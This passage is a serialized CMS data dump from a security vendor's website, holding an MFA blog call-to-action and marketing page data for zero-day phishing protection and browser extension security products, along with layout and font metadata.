ata":353245,"content":353246,"nodeType":1687},{},[353247],{"data":353248,"content":353249,"nodeType":178},{},[353250],{"data":353251,"marks":353252,"value":271031,"nodeType":173},{},[],{"data":353254,"content":353255,"nodeType":1657},{},[353256,353265,353274,353283,353292],{"data":353257,"content":353258,"nodeType":1687},{},[353259],{"data":353260,"content":353261,"nodeType":178},{},[353262],{"data":353263,"marks":353264,"value":271093,"nodeType":173},{},[],{"data":353266,"content":353267,"nodeType":1687},{},[353268],{"data":353269,"content":353270,"nodeType":178},{},[353271],{"data":353272,"marks":353273,"value":271103,"nodeType":173},{},[],{"data":353275,"content":353276,"nodeType":1687},{},[353277],{"data":353278,"content":353279,"nodeType":178},{},[353280],{"data":353281,"marks":353282,"value":271103,"nodeType":173},{},[],{"data":353284,"content":353285,"nodeType":1687},{},[353286],{"data":353287,"content":353288,"nodeType":178},{},[353289],{"data":353290,"marks":353291,"value":271122,"nodeType":173},{},[],{"data":353293,"content":353294,"nodeType":1687},{},[353295],{"data":353296,"content":353297,"nodeType":178},{},[353298],{"data":353299,"marks":353300,"value":270929,"nodeType":173},{},[],{"data":353302,"content":353303,"nodeType":1657},{},[353304,353313,353322,353331,353340],{"data":353305,"content":353306,"nodeType":1687},{},[353307],{"data":353308,"content":353309,"nodeType":178},{},[353310],{"data":353311,"marks":353312,"value":271144,"nodeType":173},{},[],{"data":353314,"content":353315,"nodeType":1687},{},[353316],{"data":353317,"content":353318,"nodeType":178},{},[353319],{"data":353320,"marks":353321,"value":271103,"nodeType":173},{},[],{"data":353323,"content":353324,"nodeType":1687},{},[353325],{"data":353326,"content":353327,"nodeType":178},{},[353328],{"data":353329,"marks":353330,"value":271103,"nodeType":173},{},[],{"data":353332,"content":353333,"nodeType":1687},{},[353334],{"data":353335,"content":353336,"nodeType":178},{},[353337],{"data":353338,"marks":353339,"value":271122,"nodeType":173},{},[],{"data":353341,"content":353342,"nodeType":1687},{},[353343],{"data":353344,"content":353345,"nodeType":178},{},[353346],{"data":353347,"marks":353348,"value":270929,"nodeType":173},{},[],{"data":353350,"content":353353,"nodeType":312},{"target":353351},{"sys":353352},{"id":271185,"type":317,"linkType":318},[],{"data":353355,"content":353356,"nodeType":235},{},[353357],{"data":353358,"marks":353359,"value":270890,"nodeType":173},{},[],{"data":353361,"content":353362,"nodeType":178},{},[353363],{"data":353364,"marks":353365,"value":271199,"nodeType":173},{},[],{"data":353367,"content":353368,"nodeType":178},{},[353369],{"data":353370,"marks":353371,"value":271206,"nodeType":173},{},[],{"data":353373,"content":353374,"nodeType":178},{},[353375],{"data":353376,"marks":353377,"value":271213,"nodeType":173},{},[],{"data":353379,"content":353382,"nodeType":312},{"target":353380},{"sys":353381},{"id":271218,"type":317,"linkType":318},[],{"data":353384,"content":353385,"nodeType":235},{},[353386],{"data":353387,"marks":353388,"value":271226,"nodeType":173},{},[],{"data":353390,"content":353391,"nodeType":178},{},[353392],{"data":353393,"marks":353394,"value":271233,"nodeType":173},{},[],{"data":353396,"content":353397,"nodeType":178},{},[353398],{"data":353399,"marks":353400,"value":271240,"nodeType":173},{},[],{"data":353402,"content":353403,"nodeType":178},{},[353404],{"data":353405,"marks":353406,"value":271247,"nodeType":173},{},[],{"data":353408,"content":353409,"nodeType":178},{},[353410],{"data":353411,"marks":353412,"value":271254,"nodeType":173},{},[],{"data":353414,"content":353415,"nodeType":178},{},[353416],{"data":353417,"marks":353418,"value":271261,"nodeType":173},{},[],{"data":353420,"content":353421,"nodeType":235},{},[353422],{"data":353423,"marks":353424,"value":271268,"nodeType":173},{},[],{"data":353426,"content":353427,"nodeType":178},{},[353428],{"data":353429,"marks":353430,"value":271275,"nodeType":173},{},[],{"data":353432,"content":353433,"nodeType":178},{},[353434,353437,353443],{"data":353435,"marks":353436,"value":271282,"nodeType":173},{},[],{"data":353438,"content":353439,"nodeType":186},{"uri":271285},[353440],{"data":353441,"marks":353442,"value":271290,"nodeType":173},{},[],{"data":353444,"marks":353445,"value":271294,"nodeType":173},{},[],{"data":353447,"content":353448,"nodeType":178},{},[353449],{"data":353450,"marks":353451,"value":271301,"nodeType":173},{},[],{"data":353453,"content":353454,"nodeType":178},{},[353455],{"data":353456,"marks":353457,"value":271308,"nodeType":173},{},[],{"data":353459,"content":353460,"nodeType":178},{},[353461],{"data":353462,"marks":353463,"value":271315,"nodeType":173},{},[],{"data":353465,"content":353466,"nodeType":235},{},[353467],{"data":353468,"marks":353469,"value":271322,"nodeType":173},{},[],{"data":353471,"content":353472,"nodeType":178},{},[353473],{"data":353474,"marks":353475,"value":271329,"nodeType":173},{},[],{"data":353477,"content":353478,"nodeType":178},{},[353479,353482,353488,353491,353497],{"data":353480,"marks":353481,"value":271336,"nodeType":173},{},[],{"data":353483,"content":353484,"nodeType":186},{"uri":271339},[353485],{"data":353486,"marks":353487,"value":271344,"nodeType":173},{},[],{"data":353489,"marks":353490,"value":271348,"nodeType":173},{},[],{"data":353492,"content":353493,"nodeType":186},{"uri":270796},[353494],{"data":353495,"marks":353496,"value":271355,"nodeType":173},{},[],{"data":353498,"marks":353499,"value":271359,"nodeType":173},{},[],{"data":353501,"content":353502,"nodeType":178},{},[353503],{"data":353504,"marks":353505,"value":271366,"nodeType":173},{},[],{"data":353507,"content":353508,"nodeType":178},{},[353509],{"data":353510,"marks":353511,"value":271373,"nodeType":173},{},[],{"data":353513,"content":353514,"nodeType":178},{},[353515],{"data":353516,"marks":353517,"value":271380,"nodeType":173},{},[],{"data":353519,"content":353520,"nodeType":235},{},[353521],{"data":353522,"marks":353523,"value":271387,"nodeType":173},{},[],{"data":353525,"content":353526,"nodeType":178},{},[353527],{"data":353528,"marks":353529,"value":271394,"nodeType":173},{},[],{"data":353531,"content":353532,"nodeType":178},{},[353533],{"data":353534,"marks":353535,"value":271401,"nodeType":173},{},[],{"data":353537,"content":353538,"nodeType":231},{},[],{"data":353540,"content":353541,"nodeType":178},{},[353542],{"data":353543,"marks":353544,"value":271411,"nodeType":173},{},[],{"data":353546,"content":353549,"nodeType":312},{"target":353547},{"sys":353548},{"id":209109,"type":317,"linkType":318},[],{"data":353551,"content":353552,"nodeType":178},{},[353553],{"data":353554,"marks":353555,"value":37,"nodeType":173},{},[],{"entries":353557},{"hyperlink":353558,"inline":353559,"block":353560},[],[],[353561,353575,353601],{"sys":353562,"__typename":335449,"content":353563,"title":353574,"buttonText":18605,"buttonUrl":352868,"signupRedirectUrl":118},{"id":271185},{"json":353564},{"data":353565,"content":353566,"nodeType":165},{},[353567],{"data":353568,"content":353569,"nodeType":178},{},[353570],{"data":353571,"marks":353572,"value":353573,"nodeType":173},{},[],"Use our platform to quickly check out which MFA methods your users have registered. Follow our detailed guidance and use our automations to speed through any future MFA deployments or improvements with ease.","Want to find out which MFA methods are used by your organisation?",{"sys":353576,"__typename":5311,"content":353577,"name":353600,"title":118},{"id":271218},{"json":353578},{"nodeType":165,"data":353579,"content":353580},{},[353581,353593],{"nodeType":178,"content":353582,"data":353592},[353583,353588],{"nodeType":173,"value":353584,"marks":353585,"data":353587},"Hint",[353586],{"type":370},{},{"nodeType":173,"value":353589,"marks":353590,"data":353591},": where available, and where they are the sole user of the device, allow users to have platforms \"remember their device\", so they only get prompted once a month or similar. ",[],{},{},{"nodeType":178,"content":353594,"data":353599},[353595],{"nodeType":173,"value":353596,"marks":353597,"data":353598},"Reducing the volume of MFA prompts will greatly reduce the chance of a user accepting prompts they didn't initiate.",[],{},{},"MFA: reduce MFA prompts insight",{"sys":353602,"__typename":15269,"type":117876,"ctaText":265256,"buttonLabel":265257,"buttonColour":152046,"buttonUrl":118},{"id":209109},{"items":353604},[353605],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":353606},{"url":19129},"content:blog:which-mfa-methods-should-you-use.json","blog/which-mfa-methods-should-you-use.json","blog/which-mfa-methods-should-you-use",[353611,353790,353909,354028,354146,354266,354386,354505],{"createdDate":353612,"id":353613,"name":353614,"modelId":353615,"published":13,"stageModifiedSincePublish":6,"query":353616,"data":353622,"variations":353778,"lastUpdated":353779,"firstPublished":353780,"testRatio":33,"screenshot":353781,"createdBy":34,"lastUpdatedBy":353782,"folders":353783,"meta":353784,"rev":353789},1744829487099,"387451215c314dd5bd654668cdc1a197","Zero-day phishing","cca4143377554c5a9163cc203a8ed2ba",[353617],{"@type":353618,"property":353619,"operator":353620,"value":353621},"@builder.io/core:Query","urlPath","is","/uc/zero-day-phishing-protection",{"inputs":353623,"customFonts":353624,"seoTitle":353671,"title":353671,"tsCode":37,"seoDescription":353672,"fontAwesomeIcon":353673,"jsCode":37,"blocks":353674,"url":353621,"state":353775},[],[353625],{"family":353626,"kind":353627,"version":353628,"lastModified":353629,"files":353630,"category":353649,"menu":353650,"subsets":353651,"variants":353654},"DM Sans","webfonts#webfont","v14","2023-07-13",{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"800italic":353639,"900italic":353640,"700italic":353641,"100italic":353642,"italic":353643,"regular":353644,"200italic":353645,"500italic":353646,"300italic":353647,"600italic":353648},"https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAop1hTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwA_JxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAkJxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAfJthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwARZthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAIpthTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAC5thTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8gCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9uCm3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDG3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxhTmf3ZGMZpg.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat8JDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat-7DW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat_XDW3zRmYJpso5.ttf","https://fonts.gstatic.com/s/dmsans/v14/rP2rp2ywxg089UriCZaSExd86J3t9jz86Mvy4qCRAL19DksVat9XCm3zRmYJpso5.ttf","sans-serif","https://fonts.gstatic.com/s/dmsans/v14/rP2tp2ywxg089UriI5-g4vlH9VoD8CmcqZG40F9JadbnoEwAopxRT23z.ttf",[353652,353653],"latin","latin-ext",[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],"100","200","300","regular","500","600","800","900","100italic","200italic","300italic","500italic","600italic","700italic","800italic","900italic","Zero-day phishing protection","Detect phishing TTPs directly in the browser and stop credential theft.","faFishingRod",[353675,353770],{"@type":106,"@version":107,"tagName":353676,"id":353677,"children":353678},"div","builder-76c6b8d1499346c7bc1fd56ae4e93638",[353679,353696,353704,353711,353721,353735,353746,353756,353762],{"@type":106,"@version":107,"layerName":353680,"id":353681,"component":353682,"responsiveStyles":353693},"UseCaseHero","builder-5228fe062bef4a40a91e43f1112832fa",{"name":353680,"options":353683,"isRSC":118},{"title":353671,"description":353684,"points":353685,"video":353692},"\u003Cp>Push detects phishing as it happens. Autonomous agents hunt for new phishing techniques, identify kit signatures, and deploy detections within minutes of a new attack being analyzed. From cloned login pages to AiTM credential harvesting, Push sees what traditional filters miss and stops threats before they escalate.\u003C/p>",[353686,353688,353690],{"item":353687},"Detect phishing that bypasses traditional filters, including AiTM, SSO password theft, and fake login pages",{"item":353689},"Stop never-before-seen attacks with AI-native behavioral and on-page analysis inside the browser",{"item":353691},"Investigate faster with unified browser, user, and page context","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F40433ceeb4f94b43a82e039a0f4fd411%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=40433ceeb4f94b43a82e039a0f4fd411&alt=media&optimized=true",{"large":353694},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},"transparent",{"@type":106,"@version":107,"id":353697,"component":353698,"responsiveStyles":353701},"builder-96634044407e491299e291ed64669e39",{"name":353699,"options":353700,"isRSC":118},"TrustedBy",{"AllPartners":41,"backgroundTransparent":6},{"large":353702},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},"#000",{"@type":106,"@version":107,"id":353705,"component":353706,"responsiveStyles":353709},"builder-2c3768f930534557bb8978e32b6a6a0f",{"name":353707,"options":353708,"isRSC":118},"Diagonal",{"darkMode":41},{"large":353710},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":353712,"id":353713,"component":353714,"responsiveStyles":353719},"TextImageBlockVertical","builder-7c3c1c2840424db2ad2ccbfaf382dd64",{"name":353712,"tag":353712,"options":353715,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":353716,"description":353717,"animatedTitle":37,"image":353718,"reverse":6,"descriptionPaddingHorizontal":118},"\u003Ch2>Why stop at the inbox?\u003C/h2>","\u003Cp>Phishing attacks have evolved. Whether attackers lure users with QR codes, instant messages, or OAuth consent screens, the outcome is the same: it plays out in the browser. Push gives you real-time detection for in-browser threats, stopping phishing and consent-based attacks before they lead to compromise\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7fdcac241f0e4a049166d7076858adeb",{"large":353720},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":353722,"component":353723,"responsiveStyles":353730},"builder-41c978b3669749cf947e622b4e79e4d7",{"name":353724,"options":353725,"isRSC":118},"TextImageBlockHorizontal",{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":353727,"description":353728,"reverse":41,"image":353729},100,"\u003Cp>Detect phishing at the edge\u003C/p>","\u003Cp>Push uses industry-first telemetry to detect phishing based on behavior, not static indicators. Autonomous agents analyze how phishing pages behave and how users interact with them, uncovering fake logins, credential theft, and phishing kits the moment they load in the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F9df3d180c97b4e61af142af2ccd68721",{"large":353731},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353733,"marginTop":353734},"DM Sans, sans-serif","20px","0px",{"@type":106,"@version":107,"id":353736,"component":353737,"responsiveStyles":353743},"builder-d2a7bc941feb43cdb898bc116b203cf9",{"name":353724,"options":353738,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":353740,"description":353741,"reverse":6,"image":353742},120,"\u003Ch2>Go beyond blocklists and IOCs\u003C/h2>","\u003Cp>Push goes beyond URLs and easy-to-change indicators. It reads the full phishing playbook like script behavior, session hijacks, DOM changes, user inputs, then connects the dots in real time. This gives your team a complete picture of how the phishing attempt worked, not just an alert.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fabfd58db169b433e96d3f1261797156e",{"large":353744},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},"36px",{"@type":106,"@version":107,"layerName":353724,"id":353747,"component":353748,"responsiveStyles":353753},"builder-42c32198083f4880acb37c5cb76934da",{"name":353724,"options":353749,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":353750,"description":353751,"reverse":41,"image":353752},"\u003Ch2>Enhance your phishing response\u003C/h2>","\u003Cp>When phishing enters your environment, speed matters. Push gives you instant access to the telemetry that counts like session data, user behavior, and page activity, so you can investigate fast, trigger in-browser prompts, or forward alerts to your SIEM or SOAR for response. All in real time, right from the browser.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fbb195aec46904056b85e8688629e558e",{"large":353754},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},"47px",{"@type":106,"@version":107,"id":353757,"component":353758,"responsiveStyles":353760},"builder-9a95b9cbc4854421a92ef7b90f6c7adb",{"name":353707,"options":353759,"isRSC":118},{"darkMode":6},{"large":353761},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":353763,"component":353764,"responsiveStyles":353768},"builder-0afa17a9f25c4661a90f314d5578aa18",{"name":353765,"tag":353765,"options":353766,"isRSC":118},"LatestResources",{"sectionHeading":37,"customClass":353767},"bg-black",{"large":353769},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":353771,"@type":106,"tagName":131,"properties":353772,"responsiveStyles":353773},"builder-pixel-h6onu0ubr9",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":353774},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":353776},{"path":37,"query":353777},{},{},1776275046831,1745499158657,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fff60c30a8442489c8ed7e0af9599d14f","kYgMv6WsbvfmlOUYqR2SFwGzw6e2",[],{"lastPreviewUrl":353785,"winningTest":118,"breakpoints":353786,"kind":353787,"hasLinks":6,"originalContentId":353788,"hasAutosaves":6},"https://pushsecurity.com/uc/zero-day-phishing-protection?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=387451215c314dd5bd654668cdc1a197&builder.overrides.387451215c314dd5bd654668cdc1a197=387451215c314dd5bd654668cdc1a197&builder.overrides.use-case-page:/uc/zero-day-phishing-protection=387451215c314dd5bd654668cdc1a197&builder.options.locale=Default",{"xsmall":57,"small":39,"medium":40},"page","2daa5670b8504fc7ba4700633e8bd921","wjcv5yvqyja",{"createdDate":353791,"id":353792,"name":353793,"modelId":353615,"published":13,"stageModifiedSincePublish":6,"query":353794,"data":353797,"variations":353901,"lastUpdated":353902,"firstPublished":353903,"testRatio":33,"screenshot":353904,"createdBy":34,"lastUpdatedBy":353782,"folders":353905,"meta":353906,"rev":353789},1756833377777,"54f8256648f54d439303734b1e69221b","Browser extension security",[353795],{"@type":353618,"property":353619,"operator":353620,"value":353796},"/uc/browser-extension-security",{"seoDescription":353798,"jsCode":37,"fontAwesomeIcon":353799,"tsCode":37,"title":353793,"seoTitle":353793,"customFonts":353800,"inputs":353805,"blocks":353806,"url":353796,"state":353898},"Shine a light on risky browser extensions.","faPuzzlePiece",[353801],{"kind":353627,"family":353626,"version":353628,"files":353802,"category":353649,"lastModified":353629,"subsets":353803,"variants":353804,"menu":353650},{"100":353631,"200":353632,"300":353633,"500":353634,"600":353635,"700":353636,"800":353637,"900":353638,"100italic":353642,"italic":353643,"regular":353644,"900italic":353640,"800italic":353639,"700italic":353641,"200italic":353645,"300italic":353647,"500italic":353646,"600italic":353648},[353652,353653],[353655,353656,353657,353658,353659,353660,128,353661,353662,353663,353664,353665,1646,353666,353667,353668,353669,353670],[],[353807,353893],{"@type":106,"@version":107,"tagName":353676,"id":353808,"meta":353809,"children":353810},"builder-71d0648c1d2f4ede8d0d0b5b28b7b94c",{"previousId":353677},[353811,353827,353834,353841,353850,353860,353870,353880,353887],{"@type":106,"@version":107,"id":353812,"meta":353813,"component":353814,"responsiveStyles":353825},"builder-ff325b4b8fad4edea53f38865947e854",{"previousId":353681},{"name":353680,"options":353815,"isRSC":118},{"title":353793,"description":353816,"points":353817,"video":353824},"\u003Cp>Browser extensions introduce new code, new permissions, and new potential for risk. Many include AI features, and most go completely unnoticed. Push gives you full visibility into every extension used across your workforce, across major browsers, so you can uncover shadow IT, assess risky permissions, and block unsafe tools before they lead to compromise.\u003C/p>",[353818,353820,353822],{"item":353819},"Discover every browser extension in use",{"item":353821},"Spot risky or unsanctioned behavior",{"item":353823},"Make informed decisions on extension policy","https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fc538aad95d7f403aa3c3551af72f67c0?alt=media&token=1411fa6d-2eac-4e6c-94bf-ea117da12d67&apiKey=f3a1111ff5be48cdbb123cd9f5795a05",{"large":353826},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353695},{"@type":106,"@version":107,"id":353828,"meta":353829,"component":353830,"responsiveStyles":353832},"builder-fb89d128c64e47cf9cbb11d90fc24523",{"previousId":353697},{"name":353699,"options":353831,"isRSC":118},{"AllPartners":41,"backgroundTransparent":6},{"large":353833},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"backgroundColor":353703},{"@type":106,"@version":107,"id":353835,"meta":353836,"component":353837,"responsiveStyles":353839},"builder-54388d35126c4d0096eeebaf8c4448cd",{"previousId":353705},{"name":353707,"options":353838,"isRSC":118},{"darkMode":41},{"large":353840},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"layerName":353712,"id":353842,"component":353843,"responsiveStyles":353848},"builder-3c8fa6785dd6466abf52a2470d66d85a",{"name":353712,"tag":353712,"options":353844,"isRSC":118},{"darkMode":6,"maxWidth":11942,"maxTextWidth":273005,"title":353845,"description":353846,"image":353847,"reverse":6},"\u003Ch2>Take control of browser extensions\u003C/h2>","\u003Cp>Attackers are increasingly using malicious browser extensions to gain access to data processed and stored in the browser. And the problem is, most security teams have no visibility into what extensions are being used. Push changes that. With browser-native telemetry, the Push extension continuously inventories browser extensions across your environment, flags the risky ones, and gives you intelligence to act. \u003C/p>\u003Cp>\u003Cbr>\u003C/p>\u003Cp>\u003Cbr>\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0a004f16a6874f4c8fdf14344acc9fec",{"large":353849},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":353851,"meta":353852,"component":353853,"responsiveStyles":353858},"builder-93738f98109a4009affb349afd7bb182",{"previousId":353722},{"name":353724,"options":353854,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353726,"title":353855,"description":353856,"reverse":41,"image":353857},"\u003Ch2>Discover every extension in use\u003C/h2>","\u003Cp>Push gives you structured, searchable data about every extension in your environment, so you’re not just seeing what’s there, but also understanding how it got there, what it can do, and who it affects. It’s the kind of granular insight that’s nearly impossible to get from traditional tools, and it lays the groundwork for better policy decisions and faster investigations.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F0e5727ca99474f14b1b7916bf6bbb782",{"large":353859},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"fontFamily":353732,"paddingTop":353733,"marginTop":353734},{"@type":106,"@version":107,"id":353861,"meta":353862,"component":353863,"responsiveStyles":353868},"builder-83393acb12ee4fdd840839185b51edb4",{"previousId":353736},{"name":353724,"options":353864,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":353739,"title":353865,"description":353866,"reverse":6,"image":353867},"\u003Ch2>Spot risky or malicious extensions\u003C/h2>","\u003Cp>Push highlights extensions with dangerous permissions, broad access, or poor reputations. This includes AI extensions that request access far beyond what their stated purpose requires. You can quickly detect sideloaded, manually installed, or development-mode extensions that bypass normal controls. And because Push shows you who’s using them and where, you can respond precisely and effectively.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Fa104d58c8da34fbb8901f738fb21453b",{"large":353869},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353745},{"@type":106,"@version":107,"layerName":353724,"id":353871,"meta":353872,"component":353873,"responsiveStyles":353878},"builder-da98e3de949646d89c53a0d1c2784664",{"previousId":353747},{"name":353724,"options":353874,"isRSC":118},{"darkMode":6,"maxWidth":11942,"imageMaxWidth":134259,"textPaddingTop":280234,"title":353875,"description":353876,"reverse":41,"image":353877},"\u003Ch2>Accelerate security reviews\u003C/h2>","\u003Cp>Most teams have extension policies, they just don’t have the data to enforce them. Push reveals how each extension entered your environment, whether it was installed manually, sideloaded, or deployed in dev mode. You’ll see which users are running what, and where, so you can surface violations, investigate quickly, and respond with confidence.\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F229f355be6f243b180f410d237a75bb3",{"large":353879},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125,"paddingTop":353755},{"@type":106,"@version":107,"id":353881,"meta":353882,"component":353883,"responsiveStyles":353885},"builder-1a689287d1a1418997d57db578a71105",{"previousId":353757},{"name":353707,"options":353884,"isRSC":118},{"darkMode":6},{"large":353886},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"@type":106,"@version":107,"id":353888,"component":353889,"responsiveStyles":353891},"builder-feb4e75029f84c10b6498ef1f8f79128",{"name":353765,"tag":353765,"options":353890,"isRSC":118},{"sectionHeading":37,"customClass":353767},{"large":353892},{"display":121,"flexDirection":122,"position":123,"flexShrink":124,"boxSizing":125},{"id":353894,"@type":106,"tagName":131,"properties":353895,"responsiveStyles":353896},"builder-pixel-jc4lv2mnufo",{"src":133,"aria-hidden":134,"alt":37,"role":135,"width":124,"height":124},{"large":353897},{"height":124,"width":124,"display":138,"opacity":124,"overflow":139,"pointerEvents":140},{"deviceSize":142,"location":353899},{"path":37,"query":353900},{},{},1776275365038,1757000441666,"https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8d496cf111644ee5afcc046b72d1ca5a",[],{"kind":353787,"winningTest":118,"breakpoints":353907,"lastPreviewUrl":353908,"hasLinks":6,"originalContentId":353613,"hasAutosaves":6},{"xsmall":57,"small":39,"medium":40},"https://pushsecurity.com/uc/browser-extension-security?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=use-case-page&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.use-case-page=54f8256648f54d439303734b1e69221b&builder.overrides.54f8256648f54d439303734b1e69221b=54f8256648f54d439303734b1e69221b&builder.overrides.use-case-page:/uc/browser-extension-security=54f8256648f54d439303734b1e69221b&builder.options.locale=Default",{"createdDate":353910,"id":353911,"name":353912,"modelId":353615,"published":13,"query":353913,"data":353916,"variations":354019,"lastUpdated":354020,"firstPublished":354021,"testRatio":33,"screenshot":354022,"createdBy":34,"lastUpdatedBy":354023,"folders":354024,"meta":354025,"rev":353789},1744923509705,"94bebb7bb99d48629ad157e80cf4d81d","Account takeover 